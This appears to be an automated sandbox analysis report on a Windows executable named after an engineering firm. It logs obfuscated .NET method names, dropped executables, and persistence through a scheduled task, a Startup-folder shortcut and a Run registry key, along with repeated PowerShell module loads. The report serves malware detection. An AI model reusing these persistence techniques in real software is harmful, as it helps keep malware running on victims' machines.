Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, LwbRpltv1eAnYuONRA.cs	High entropy of concatenated method names: 'fhw3seLceb', 'x6S3tB16bH', 'vlk3Pk2ZwH', 'zFP3vf2m0M', 'iNu35BAFAo', 'KIU31Tia8Y', 'fdd3T36ZGr', 'zbM34jg97S', 'Mcm3DpfXPH', 'lmv38Hc11g'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, rWZZ7wHORJniJhaBFo.cs	High entropy of concatenated method names: 'Dispose', 'xoF6JoJX1N', 'lcEq57qBiY', 'cfgGG8m4Yr', 'iDr6IHDL7W', 'Wva6ziaYYN', 'ProcessDialogKey', 'sccq928ptv', 'S7vq691ehf', 'YPbqqChRhg'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, OM9lZPwkAKr27WGp6r.cs	High entropy of concatenated method names: 'GV1M60hwBb', 'F4MMSvjG1c', 'qQyMKjlQ04', 'PYaMdml7lZ', 'NJVMaKQwNU', 'NSnMCsgNBB', 'HYRMiaN6mt', 'HwxX2jeeW1', 'JWFX7MXQYH', 'OiJXJw5oEU'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, jO1kLrkP6ITRPB9nRt.cs	High entropy of concatenated method names: 'e3yiLkv75w', 'Kvqia7Oluw', 'iXLiCiQfMB', 'RuuiZm7rqr', 'XWIincnmRA', 'biPCrgXJTD', 'NYeCuR1g51', 'swwC2J3LQV', 'pmhC7kZtQP', 'wwUCJdl7pJ'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, BCDpIFlNesVBIhQHgH.cs	High entropy of concatenated method names: 'lXwaPYplWD', 'z8Nav71VNK', 'iANa0QeSDq', 'j1Wap46uak', 'KPdarOnI7r', 'uYfaunmUii', 'u0Oa24HKnA', 'XsMa7Bwc1Z', 'ofiaJfrVbH', 'lr3aIFIlXL'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, GXpMZGv1DYx8eclQhb.cs	High entropy of concatenated method names: 'KoPZYBhF60', 'rncZgltk8v', 'Gl9ZOe5NAl', 'wnZZBSVfSR', 'K11ZHipBT4', 'AfsZjno0nB', 'T3DZw9LAED', 'PKVZbfGvp0', 'FncZAWsLVC', 'Ru5ZE8OZeU'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, ibRWnPCp5Mnp1nfdT7.cs	High entropy of concatenated method names: 'jxiZdXpYPh', 'BZwZkGZ8QB', 'oIYZiFpI7x', 'VIJiImoIrk', 'huRizFyiho', 'FDMZ9qipOS', 'umsZ6t9Q1O', 'aZoZq8PCQE', 'ooIZSlQtB1', 'W9SZKBc8tf'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, z0CgWreVct1ReW3hxU.cs	High entropy of concatenated method names: 'mDAXFkkbHn', 'dctX5MK7Lg', 'g0vX1UHwpQ', 'j6MXTavJ4c', 'Y18XPtIOUL', 'RhBX43i8tY', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, nlbUxk0n9w0SE2fT7Q.cs	High entropy of concatenated method names: 'WWIO9AVG3', 'Ne7BnsFyu', 'bD7j21WOg', 'QenwWWX3C', 'K4tAy5db2', 'FVVERgVRY', 'KtUTIYS1GuG3NHE4hT', 'TneXqpwWvj94Synw3e', 'sYqXSVatY', 'EY8VvQfHi'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, OZMP2hxHpjh7kQFAPP.cs	High entropy of concatenated method names: 'zHSkBOqRCM', 'fvWkjnFHMI', 'QMUkbnecsd', 'WbRkAByqeu', 'wjyk3yw1ZY', 'bQakUMWAe6', 'PF2kc6KTkL', 'CKJkX9v5wS', 'j9tkMUQEKJ', 'dvnkVTQUiU'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, CrrfYkO0sG17BJWtfW5.cs	High entropy of concatenated method names: 'MJiVYtxXQP', 'pBBVgBtZLN', 'eZKVOZRt5b', 'SXM6a1hB2Wh3aOPU4tB', 'aq00efhW0lmUyDNoI29', 'uddTSNhocRZNSkxL8ov', 'BAAsfnh00pMtM1VHsFv', 'L3vXCmhhfrYCZSKbPqy'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, xqcOSno5WVFAjguVYG.cs	High entropy of concatenated method names: 'PjeCHrVhhT', 'fJ1Cww9irJ', 'TNMk1c5LZM', 'Tx8kThUqZg', 'M91k4QKN9X', 'HS1kDOGODI', 'ox1k8tdxFm', 'dcQkQJxjMj', 'An2khOu51C', 'OJpksIvvBn'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, Uuj6qeW9tPXjBmNpHg.cs	High entropy of concatenated method names: 'ToString', 'BxxUm4fk9J', 'Qv0U57V9et', 'gfvU19R5LD', 'YJjUTfT8hJ', 'r4HU4xrivv', 'nnDUDT8Nm7', 'xWNU8CFPl5', 'IFHUQJSC27', 'NkdUhwRTFH'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, gv9ulKIH2QRgfIOudI.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Wo1qJryaEA', 'DqWqI58PXB', 'W3Uqz4ix98', 'J0XS9mcDjl', 'Y0oS6IBJBx', 'Q4JSqtkwUt', 'Ab2SSpPgvw', 'pIlUKKBtDd2wBeZchht'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, MBp5MtOrZjC7IY1p5BK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g1qVPmxEEJ', 'DRMVvWacuy', 'gRrV0MPdjr', 'X7cVp0KttN', 'MeAVruIKI5', 'EdvVuP6MHE', 'aduV2JUp5X'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, gsQB8HRrROaMJigu8D.cs	High entropy of concatenated method names: 'AnOce1l820', 'HwXcW7xNac', 'ToString', 'NxlcdYfZPl', 'oEycauIgFw', 'Fc6ck42L0Z', 'PHCcCyhJ6e', 'wbrcipe1dp', 'T7vcZ0xLjW', 'VTLcniYyOl'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, jVOKqx6OHHAubw6pMN.cs	High entropy of concatenated method names: 'wV4NbIA5QD', 'CUQNAQr6Vs', 'nE6NFKTVhT', 'T1AN5dYyo7', 'vi6NT4mdAu', 'D00N4j8Bxg', 'OlNN8UZn9K', 'P1TNQuolZP', 'oTBNs4HKnn', 'I1ENmDMYmn'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	High entropy of concatenated method names: 't4rSL2c26G', 'SxXSd44Tdi', 'rZxSaJFkXb', 'fiXSkdiHdM', 'Ou0SCt4Dx9', 'G6ySiMIOnA', 'oGQSZfZ18x', 'LSiSnhZ3ll', 'IN7SfWnrA4', 'YvESeiRRFw'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dJa6sC2NfcTNVggMrM.cs	High entropy of concatenated method names: 'EZ6c7IB2gG', 'wbUcILSSQm', 'QT1X9jI0iR', 'tRkX6YTTiD', 'PWZcmH7bNt', 'iPqct10GRt', 'hPocxEkDp2', 'x1jcPfIGNT', 'xo6cvB2C6B', 'lUwc0vhIE4'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, vBXDN7cPr3ZGX8ky0g.cs	High entropy of concatenated method names: 'vEN6ZLAlPY', 'nlB6nVC6YJ', 'tX36e6QIRP', 'dH76W27ASA', 'fIt63JQWM9', 'plL6UVm9uL', 'GPnvoA4eyKgKhSgeYK', 'Oe5HtK52Gi0QMqiaCu', 'cor66QSbY9', 'Utk6SCP6jg'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, LuuKNTdSfqNmEuA9vR.cs	High entropy of concatenated method names: 'NyTXdUUnST', 'SAbXaci9UC', 'a1tXkmH6ka', 'biiXCjp2hq', 'aqkXiXthGN', 'aLKXZvFiyM', 'sRAXn1GsPH', 'MbCXfEwaJF', 'OGeXeXX8FR', 'accXWdo6pP'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, iQwA4eOJ8Zfn4HwcUAj.cs	High entropy of concatenated method names: 'cEXMYd4SRm', 'kkeMgRcSuH', 'nCqMOCYQc7', 'bQ7MBqi27n', 'HmbMHmWmU4', 'X7jMjqHQq0', 'CmsMwlGo8d', 'CYoMb6XpQ4', 'afnMAwQsUD', 's3fMEbsAEH'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, LwbRpltv1eAnYuONRA.cs	High entropy of concatenated method names: 'fhw3seLceb', 'x6S3tB16bH', 'vlk3Pk2ZwH', 'zFP3vf2m0M', 'iNu35BAFAo', 'KIU31Tia8Y', 'fdd3T36ZGr', 'zbM34jg97S', 'Mcm3DpfXPH', 'lmv38Hc11g'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, rWZZ7wHORJniJhaBFo.cs	High entropy of concatenated method names: 'Dispose', 'xoF6JoJX1N', 'lcEq57qBiY', 'cfgGG8m4Yr', 'iDr6IHDL7W', 'Wva6ziaYYN', 'ProcessDialogKey', 'sccq928ptv', 'S7vq691ehf', 'YPbqqChRhg'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, OM9lZPwkAKr27WGp6r.cs	High entropy of concatenated method names: 'GV1M60hwBb', 'F4MMSvjG1c', 'qQyMKjlQ04', 'PYaMdml7lZ', 'NJVMaKQwNU', 'NSnMCsgNBB', 'HYRMiaN6mt', 'HwxX2jeeW1', 'JWFX7MXQYH', 'OiJXJw5oEU'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, jO1kLrkP6ITRPB9nRt.cs	High entropy of concatenated method names: 'e3yiLkv75w', 'Kvqia7Oluw', 'iXLiCiQfMB', 'RuuiZm7rqr', 'XWIincnmRA', 'biPCrgXJTD', 'NYeCuR1g51', 'swwC2J3LQV', 'pmhC7kZtQP', 'wwUCJdl7pJ'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, BCDpIFlNesVBIhQHgH.cs	High entropy of concatenated method names: 'lXwaPYplWD', 'z8Nav71VNK', 'iANa0QeSDq', 'j1Wap46uak', 'KPdarOnI7r', 'uYfaunmUii', 'u0Oa24HKnA', 'XsMa7Bwc1Z', 'ofiaJfrVbH', 'lr3aIFIlXL'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, GXpMZGv1DYx8eclQhb.cs	High entropy of concatenated method names: 'KoPZYBhF60', 'rncZgltk8v', 'Gl9ZOe5NAl', 'wnZZBSVfSR', 'K11ZHipBT4', 'AfsZjno0nB', 'T3DZw9LAED', 'PKVZbfGvp0', 'FncZAWsLVC', 'Ru5ZE8OZeU'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, ibRWnPCp5Mnp1nfdT7.cs	High entropy of concatenated method names: 'jxiZdXpYPh', 'BZwZkGZ8QB', 'oIYZiFpI7x', 'VIJiImoIrk', 'huRizFyiho', 'FDMZ9qipOS', 'umsZ6t9Q1O', 'aZoZq8PCQE', 'ooIZSlQtB1', 'W9SZKBc8tf'

Drops PE files

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe			Jump to dropped file
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SS Bottmac Engineers Pvt. Ltd..lnk

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SS Bottmac Engineers Pvt. Ltd..lnk

Jump to behavior

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SS Bottmac Engineers Pvt. Ltd.			Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SS Bottmac Engineers Pvt. Ltd.			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
